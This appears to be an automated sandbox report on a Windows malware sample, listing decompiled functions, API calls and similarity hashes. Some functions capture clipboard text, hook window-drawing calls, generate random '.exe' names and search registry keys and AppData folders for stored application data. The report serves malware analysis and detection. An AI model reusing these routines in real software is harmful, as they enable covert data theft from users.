Instruction Fuzzy Hash: 5C21A471A00208BEDB11EBA0DD49FEE77ADEB44308F500076F901F7191DAB49E519B59

Uniqueness

Uniqueness Score: -1.00%

Function 0041D325, Relevance: 7.6, APIs: 5, Instructions: 70
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041D325(void* _a4) {
				signed int _t11;
				void* _t21;
				void* _t23;
				void* _t24;
				int _t25;

				_t25 = _a4;
				_t23 = GetClipboardData(_t25);
				_a4 = _t23;
				if(E00406473() == 0) {
					return _t23;
				}
				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
					L20:
					return _a4;
				} else {
					_t21 = GlobalLock(_t23);
					if(_t21 == 0) {
						L19:
						goto L20;
					}
					_t11 = _t25 - 1;
					if(_t11 == 0) {
						_push(_t21);
						_push(0);
						L12:
						_t24 = E00411C01(_t11 | 0xffffffff);
						L15:
						if(_t24 != 0) {
							EnterCriticalSection(0x424010);
							E0041D022(0x404c3c);
							E0041D022(_t24);
							LeaveCriticalSection(0x424010);
							if(_t24 != _t21) {
								E004119C1(_t24);
							}
						}
						GlobalUnlock(_a4);
						goto L19;
					}
					_t11 = _t11 - 6;
					if(_t11 == 0) {
						_push(_t21);
						_push(1);
						goto L12;
					}
					if(_t11 != 6) {
						_t24 = _a4;
					} else {
						_t24 = _t21;
					}
					goto L15;
				}
			}

0x0041d329
0x0041d334
0x0041d336
0x0041d340
0x00000000
0x0041d342
0x0041d34b
0x0041d3d3
0x00000000
0x0041d360
0x0041d368
0x0041d36c
0x0041d3d2
0x00000000
0x0041d3d2
0x0041d370
0x0041d371
0x0041d390
0x0041d391
0x0041d384
0x0041d38c
0x0041d398
0x0041d39a
0x0041d3a2
0x0041d3ad
0x0041d3b3
0x0041d3b9
0x0041d3c1
0x0041d3c4
0x0041d3c4
0x0041d3c1
0x0041d3cc
0x00000000
0x0041d3cc
0x0041d373
0x0041d376
0x0041d381
0x0041d382
0x00000000
0x0041d382
0x0041d37b
0x0041d395
0x0041d37d
0x0041d37d
0x0041d37d
0x00000000
0x0041d37b

APIs

GetClipboardData.USER32 ref: 0041D32E

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

GlobalLock.KERNEL32 ref: 0041D362
EnterCriticalSection.KERNEL32(00424010,00000000,00000000), ref: 0041D3A2
LeaveCriticalSection.KERNEL32(00424010,00000000,00404C3C), ref: 0041D3B9
GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 0041D3CC

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
String ID:
API String ID: 1109978993-0
Opcode ID: 8b9c6fc58f3d50b5bdc60fbcd026a31fa0d3de1716b66c980286557b20d91fa6
Instruction ID: d1cf1c9394f775619866213a00465160f987ab73033397a736e2680d1fa98aad
Opcode Fuzzy Hash: 8b9c6fc58f3d50b5bdc60fbcd026a31fa0d3de1716b66c980286557b20d91fa6
Instruction Fuzzy Hash: 601127B6D0011CA7CB111E699C84AEF6B199B89355B150137FD25E7360CB3C8CC296AF

Uniqueness

Uniqueness Score: -1.00%

Function 00414EE6, Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000002,00000000), ref: 00414EF8
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 00414F22
WSAGetLastError.WS2_32 ref: 00414F29
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414F55

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

closesocket.WS2_32(?), ref: 00414F69

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
String ID:
API String ID: 2355469559-0
Opcode ID: d770af796127c7ce969bfb0037b0d61c0ec5abd71003652aea86083fdda22567
Instruction ID: 9f557ebcef03bf3ccdf17cd5f16f29e2306636648d2600cb3b0c409c63ac2c63
Opcode Fuzzy Hash: d770af796127c7ce969bfb0037b0d61c0ec5abd71003652aea86083fdda22567
Instruction Fuzzy Hash: 391121B1801128BFDB10AF65DD49CDF7E6CEF853A4B104125F509A6260D7349F81DAA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040C1BC, Relevance: 7.6, APIs: 5, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040C1BC(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
				int _t20;
				signed int _t21;
				struct HWND__* _t28;
				char* _t32;

				_t28 = _a4;
				if(( *0x422530 & 0x00000004) == 0 || E00406473() == 0) {
					L9:
					return GetUpdateRect(_t28, _a8, _a12);
				} else {
					_t32 = TlsGetValue( *0x423e7c);
					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
						goto L9;
					} else {
						if(_a8 != 0) {
							_t6 = _t32 + 0xc; // 0xc
							E004119FD( &_a8, _t6, 0x10);
						}
						if(_a12 != 0) {
							_t20 = SaveDC( *(_t32 + 8));
							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
							RestoreDC( *(_t32 + 8), _t20);
						}
						 *_t32 = 1;
						return 1;
					}
				}
			}

0x0040c1c7
0x0040c1cb
0x0040c23c
0x00000000
0x0040c1d6
0x0040c1e2
0x0040c1e6
0x00000000
0x0040c1ed
0x0040c1f1
0x0040c1f5
0x0040c1fd
0x0040c1fd
0x0040c206
0x0040c20c
0x0040c21c
0x0040c224
0x0040c22b
0x0040c22e
0x0040c234
0x0040c238
0x00000000
0x0040c238
0x0040c1e6

APIs

GetUpdateRect.USER32(?,?,?), ref: 0040C243

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

TlsGetValue.KERNEL32 ref: 0040C1DC
SaveDC.GDI32(?), ref: 0040C20C
SendMessageW.USER32(?,00000014,?,00000000), ref: 0040C21C
RestoreDC.GDI32(?,00000000), ref: 0040C22E

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: be937d2d1928862ad7c2b8869f4d78214739bef62d4be18588d734f57feb79bf
Instruction ID: ffefb783a74f8a3e41984800a1598f9da48770ba7658382f9d033757a76e3880
Opcode Fuzzy Hash: be937d2d1928862ad7c2b8869f4d78214739bef62d4be18588d734f57feb79bf
Instruction Fuzzy Hash: 32118231500305EBCB219FA5DD88F9B7BA8EB05710F04867BF996E29B1C7389440CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3B1, Relevance: 7.5, APIs: 5, Instructions: 48
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040C3B1() {
				struct tagMSG _v32;
				signed int _t12;
				char _t17;
				void* _t21;

				SetThreadPriority(GetCurrentThread(), 1);
				SetEvent( *0x423e84);
				while(1) {
					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
					if(_t12 == 0xffffffff) {
						break;
					}
					if(_t12 == 0) {
						break;
					}
					if(_v32.message ==  *0x423e80 && _v32.wParam == 0xfffffffc) {
						_t17 = E0040BC64( *0x423e88 + 0x114, _t19, _t21, 0x423e78, _v32.lParam, 1);
						_t19 =  *0x423e88;
						 *((char*)( *0x423e88 + 0x124)) = _t17;
						SetEvent( *0x423e84);
					}
				}
				return _t12 & 0xffffff00 | _t12 == 0x00000000;
			}

0x0040c3c5
0x0040c3d7
0x0040c426
0x0040c431
0x0040c436
0x00000000
0x00000000
0x0040c3e3
0x00000000
0x00000000
0x0040c3ef
0x0040c40d
0x0040c412
0x0040c418
0x0040c424
0x0040c424
0x0040c3ef
0x0040c444

APIs

GetCurrentThread.KERNEL32 ref: 0040C3BE
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,00406F37), ref: 0040C3C5
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,00406F37), ref: 0040C3D7
SetEvent.KERNEL32(00423E78,?,00000001), ref: 0040C424
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 0040C431

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: EventThread$CurrentMessagePriority
String ID:
API String ID: 3943651903-0
Opcode ID: 8fb972f565ed3a4a5c8eb57b662121cb3ba829d3c5b2966bc93e8d08007bba5e
Instruction ID: f6ed974d804835e9870ade9f19b756a62aaf5ff28ad91f857aab1ddd5e1ce793
Opcode Fuzzy Hash: 8fb972f565ed3a4a5c8eb57b662121cb3ba829d3c5b2966bc93e8d08007bba5e
Instruction Fuzzy Hash: 65019231604204EBCA209B68AD46BAA77A4AB84730F55037AF920E21F0D7789916CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040824F, Relevance: 7.5, APIs: 5, Instructions: 32synchronizationwindowCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,74EDA660,00408688,00000000), ref: 00408255
ReleaseMutex.KERNEL32(?), ref: 00408289
IsWindow.USER32(?), ref: 00408290
PostMessageW.USER32(?,00000215,00000000,?), ref: 004082AA
SendMessageW.USER32(?,00000215,00000000,?), ref: 004082B2

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: cd6db6c4a674f2ffcbb895885744f84e28aa0331693c63fd7c1cc8077caf74c3
Instruction ID: 00a4dbb78de2dd5afb03c172a336ff561b356f9cde3b91d48412c8aa583deb50
Opcode Fuzzy Hash: cd6db6c4a674f2ffcbb895885744f84e28aa0331693c63fd7c1cc8077caf74c3
Instruction Fuzzy Hash: F5F0C9741047009FC3219F24DD48DA6BBB5FB99711B044BBDF896A37B1CB74A884DB25

Uniqueness

Uniqueness Score: -1.00%

Function 00415D40, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415D40(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t56;
				WCHAR* _t57;
				short* _t59;
				signed short _t71;
				char* _t77;
				signed int _t84;
				signed short* _t85;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;

				_t87 = E00412D46(__eax & 0x000000ff, __ecx & 0x000000ff);
				_v16 = _t87;
				_t56 = E00412CFA();
				_t77 = "bcdfghklmnpqrstvwxz";
				if((_t56 & 0x00000100) == 0) {
					_v32 = "aeiouy";
					_v28 = _t77;
				} else {
					_v32 = _t77;
					_v28 = "aeiouy";
				}
				_t84 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t87 > 0) {
					_v20 = _a4 & 0x00000004;
					do {
						if(_v8 == 2) {
							if((E00412CFA() & 0x00000100) == 0) {
								_v32 = "aeiouy";
								_v28 = _t77;
							} else {
								_v32 = _t77;
								_v28 = "aeiouy";
							}
							_v8 = _v8 & 0x00000000;
						}
						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
						if(_v20 == 0 || _t84 - _v12 <= 1 || (E00412CFA() & 0x00000101) != 0x101) {
							_t71 =  *((char*)(E00412D46(_v24 - 1, 0) + _t88));
						} else {
							_t71 = 0x20;
							_v12 = _t84;
						}
						_a8[_t84] = _t71;
						_t84 = _t84 + 1;
						_v8 = _v8 + 1;
					} while (_t84 < _v16);
					_t87 = _v16;
				}
				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
					_t85 = _a8;
				} else {
					_t85 = _a8;
					_t59 = _t85 + _t87 * 2 - 2;
					while( *_t59 == 0x20) {
						_t59 = _t59 - 2;
						_t87 = _t87 - 1;
						if(_t87 != 0) {
							continue;
						} else {
						}
						goto L24;
					}
				}
				L24:
				_t57 = 0;
				_t85[_t87] = 0;
				if((_a4 & 0x00000002) != 0) {
					_t57 = CharUpperW( *_t85 & 0x0000ffff);
					 *_t85 = 0;
				}
				return _t57;
			}

0x00415d55
0x00415d57
0x00415d5a
0x00415d5f
0x00415d69
0x00415d77
0x00415d7e
0x00415d6b
0x00415d6b
0x00415d6e
0x00415d6e
0x00415d81
0x00415d83
0x00415d86
0x00415d8b
0x00415d97
0x00415d9a
0x00415d9e
0x00415daa
0x00415db8
0x00415dbf
0x00415dac
0x00415dac
0x00415daf
0x00415daf
0x00415dc2
0x00415dc2
0x00415dc9
0x00415ddf
0x00415de2
0x00415e13
0x00415e00
0x00415e02
0x00415e03
0x00415e03
0x00415e1b
0x00415e1f
0x00415e20
0x00415e23
0x00415e2c
0x00415e2c
0x00415e33
0x00415e4e
0x00415e39
0x00415e39
0x00415e3c
0x00415e40
0x00415e46
0x00415e49
0x00415e4a
0x00000000
0x00000000
0x00415e4c
0x00000000
0x00415e4a
0x00415e40
0x00415e51
0x00415e51
0x00415e57
0x00415e5b
0x00415e61
0x00415e67
0x00415e67
0x00415e6e

APIs

Part of subcall function 00412CFA: GetTickCount.KERNEL32 ref: 00412CFA

CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 00415E61

Strings

bcdfghklmnpqrstvwxz, xrefs: 00415D5F
.exe, xrefs: 00415D4B
aeiouy, xrefs: 00415D6E, 00415D77, 00415DAF, 00415DB8

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CharCountTickUpper
String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
API String ID: 2674899715-3410450461
Opcode ID: beaa0367e3124e3ec47e279d5ab8991111d62891ced75b9e5f752712e0ba679c
Instruction ID: dd3529ccd459f53c7a53bdf670feb9bf0a6af38c25f2a78d6b3ef3f54e56a681
Opcode Fuzzy Hash: beaa0367e3124e3ec47e279d5ab8991111d62891ced75b9e5f752712e0ba679c
Instruction Fuzzy Hash: 52316BB6D00A09DBCB109FA9C5453EEBBB4FF84304F54846BD851AB240D37C9B818BD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD91, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040DD91(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v76;
				char _v116;
				char _v636;
				short _v1156;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E00411A74( &_v12,  &_v12, 0, 8);
				_t28 = 0x60;
				E00419DD3(_t28,  &_v116);
				_t30 = 0x61;
				E00419DD3(_t30,  &_v52);
				_t55 =  &_v636;
				_t35 = E00415AE5(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
						E0040DB49(_t65,  &_v1156,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E004119C1(_v12);
					}
					_push(0xcb);
					return E0040C9F4(_t54, _v12, 0x63);
				} else {
					_t60 =  &_v76;
					_t39 = 0x62;
					E00419DD3(_t39, _t60);
					_v28 = 0x23;
					_v24 = 0x1a;
					_v20 = 0x26;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v636;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E004170EA( &_v636,  &_v16, _t68, 1, 2, E0040DBA3,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x0040dd91
0x0040dd91
0x0040dda6
0x0040ddb0
0x0040ddb1
0x0040ddbb
0x0040ddbc
0x0040ddcf
0x0040ddda
0x0040dde2
0x0040dde4
0x0040dde6
0x0040ddf3
0x0040de04
0x0040de04
0x0040dde6
0x0040de0c
0x0040de74
0x0040de74
0x00000000
0x0040de8b
0x0040de79
0x00000000
0x0040de0e
0x0040de10
0x0040de13
0x0040de14
0x0040de1b
0x0040de22
0x0040de29
0x0040de30
0x0040de33
0x0040de35
0x0040de35
0x0040de43
0x0040de49
0x0040de4b
0x0040de5d
0x0040de66
0x0040de66
0x0040de6b
0x0040de6c
0x0040de71
0x00000000
0x0040de71

APIs

Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0040DDF3
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0040DE43

Strings

#, xrefs: 0040DE1B
&, xrefs: 0040DE29

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: adc5832fa4841db1558202c5a8969cf429502c28623afd93d6ee9f9138e44bd7
Instruction ID: de998fd12ecfd6a1462ecb3c26c5d0b4a3347104c184a846e60a16bfa850efe8
Opcode Fuzzy Hash: adc5832fa4841db1558202c5a8969cf429502c28623afd93d6ee9f9138e44bd7
Instruction Fuzzy Hash: A9314FB2D00218AADF10ABE0DC99EEFB77CEB04308F14456BF615F7191D6785E898B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E641, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040E641(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char _v68;
				char _v120;
				char _v644;
				short _v1164;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E00411A74( &_v12,  &_v12, 0, 8);
				_t28 = 0x77;
				E00419DD3(_t28,  &_v120);
				_t30 = 0x78;
				E00419DD3(_t30,  &_v44);
				_t55 =  &_v644;
				_t35 = E00415AE5(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
						E0040E3E4(_t65,  &_v1164,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E004119C1(_v12);
					}
					_push(0xcb);
					return E0040C9F4(_t54, _v12, 0x7a);
				} else {
					_t60 =  &_v68;
					_t39 = 0x79;
					E00419DD3(_t39, _t60);
					_v28 = 0x1a;
					_v24 = 0x26;
					_v20 = 0x23;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v644;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E004170EA( &_v644,  &_v16, _t68, 1, 2, E0040E41C,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x0040e641
0x0040e641
0x0040e656
0x0040e660
0x0040e661
0x0040e66b
0x0040e66c
0x0040e67f
0x0040e68a
0x0040e692
0x0040e694
0x0040e696
0x0040e6a3
0x0040e6b4
0x0040e6b4
0x0040e696
0x0040e6bc
0x0040e724
0x0040e724
0x00000000
0x0040e73b
0x0040e729
0x00000000
0x0040e6be
0x0040e6c0
0x0040e6c3
0x0040e6c4
0x0040e6cb
0x0040e6d2
0x0040e6d9
0x0040e6e0
0x0040e6e3
0x0040e6e5
0x0040e6e5
0x0040e6f3
0x0040e6f9
0x0040e6fb
0x0040e70d
0x0040e716
0x0040e716
0x0040e71b
0x0040e71c
0x0040e721
0x00000000
0x0040e721

APIs

Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0040E6A3
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0040E6F3

Strings

#, xrefs: 0040E6D9
&, xrefs: 0040E6D2

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: 83aadc7df684594267f1f05e2fce5273f0e8e628678e53fd479ed1bde99f2cc2
Instruction ID: 9b0cfd9cef65b5984fc31b85bbe480535c8a49090ec1e8169855d4329bb318ab
Opcode Fuzzy Hash: 83aadc7df684594267f1f05e2fce5273f0e8e628678e53fd479ed1bde99f2cc2
Instruction Fuzzy Hash: 0F3173B2D00218AADF109BA19C85EDFB77CEB44308F10497BF601F71C1DA785E858B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040666E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040666E(void* __ecx, WCHAR* __edi, char _a4) {
				char _v108;
				char _v158;
				char _v178;
				char _v198;
				char _v596;
				void* __esi;
				signed int _t12;
				int _t14;
				WCHAR* _t16;
				char* _t18;
				WCHAR* _t19;

				_t19 = __edi;
				 *__edi = 0;
				E00406619(__ecx,  &_v596);
				_t2 =  &_a4; // 0x405e38
				_t12 =  *_t2;
				if(_t12 == 0) {
					L6:
					_t18 =  &_v178;
					goto L7;
				} else {
					_t12 = _t12 - 1;
					if(_t12 == 0) {
						_t18 =  &_v198;
						L7:
						_t16 = 0x422590;
						goto L8;
					} else {
						_t12 = _t12 - 1;
						if(_t12 == 0) {
							goto L6;
						} else {
							_t14 = _t12 - 1;
							if(_t14 == 0) {
								_t16 = L"SOFTWARE\\Microsoft";
								_t18 =  &_v158;
								L8:
								_t21 =  &_v108;
								_t14 = E00411BCC(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
								if(_t14 != 0) {
									_t14 = E00417246(_t21, _t19, _t16);
									if(_t14 == 0) {
										L12:
										_t14 = 0;
										 *_t19 = 0;
									} else {
										if(_a4 == 0) {
											_t14 = PathRenameExtensionW(_t19, L".dat");
											if(_t14 == 0) {
												goto L12;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t14;
			}

0x0040666e
0x0040667a
0x00406685
0x0040668a
0x0040668d
0x00406690
0x004066b0
0x004066b0
0x00000000
0x00406692
0x00406692
0x00406693
0x004066a8
0x004066b6
0x004066b6
0x00000000
0x00406695
0x00406695
0x00406696
0x00000000
0x00406698
0x00406698
0x00406699
0x0040669b
0x004066a0
0x004066bb
0x004066bf
0x004066c5
0x004066cc
0x004066d2
0x004066d9
0x004066f1
0x004066f1
0x004066f3
0x004066db
0x004066df
0x004066e7
0x004066ef
0x00000000
0x00000000
0x004066ef
0x004066df
0x004066d9
0x004066cc
0x00406699
0x00406696
0x00406693
0x004066f9

APIs

PathRenameExtensionW.SHLWAPI(?,.dat,?,00422590,00000000,00000032,?,77A19EB0,00000000), ref: 004066E7

Strings

.dat, xrefs: 004066E1
SOFTWARE\Microsoft, xrefs: 0040669B
8^@, xrefs: 0040668A

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ExtensionPathRename
String ID: .dat$8^@$SOFTWARE\Microsoft
API String ID: 3337224433-3873279264
Opcode ID: 65ba8bf1092b7e803ae660c3e55856e6de0ba63ad58867742bb5ef8d48e020f9
Instruction ID: 404c38e0d0a24e5c798407f6c772577cd3f37ba950b1ec48a16a6aaecc3b5e60
Opcode Fuzzy Hash: 65ba8bf1092b7e803ae660c3e55856e6de0ba63ad58867742bb5ef8d48e020f9
Instruction Fuzzy Hash: 5001D83060021596DB209B64CD41BABB76C9F10744F41087BE916F32C1EB7DDEA0C65D

Uniqueness

Uniqueness Score: -1.00%

Function 00416DC6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00416DC6(WCHAR* _a4) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t11;
				void* _t19;
				void* _t20;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t19 = 0;
				while(1) {
					_push(E00412CFA());
					_push(L"tmp");
					_t18 =  &_v1044;
					_t11 = E004126B4(_t10, 0x104,  &_v1044, L"%s%08x");
					_t20 = _t20 + 0xc;
					if(_t11 == 0xffffffff) {
						goto L6;
					}
					if(E00417246(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
						_t19 = _t19 + 1;
						if(_t19 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x00416de9
0x00416e3f
0x00000000
0x00416e3f
0x00416deb
0x00416ded
0x00416df2
0x00416df3
0x00416e02
0x00416e08
0x00416e0d
0x00416e13
0x00000000
0x00000000
0x00416e28
0x00416e39
0x00416e3d
0x00000000
0x00000000
0x00000000
0x00416e47
0x00000000
0x00416e47
0x00416e28
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?,00000000,?), ref: 00416DDD

Part of subcall function 00412CFA: GetTickCount.KERNEL32 ref: 00412CFA

Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00416E2F

Strings

%s%08x, xrefs: 00416DF8
tmp, xrefs: 00416DF3

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
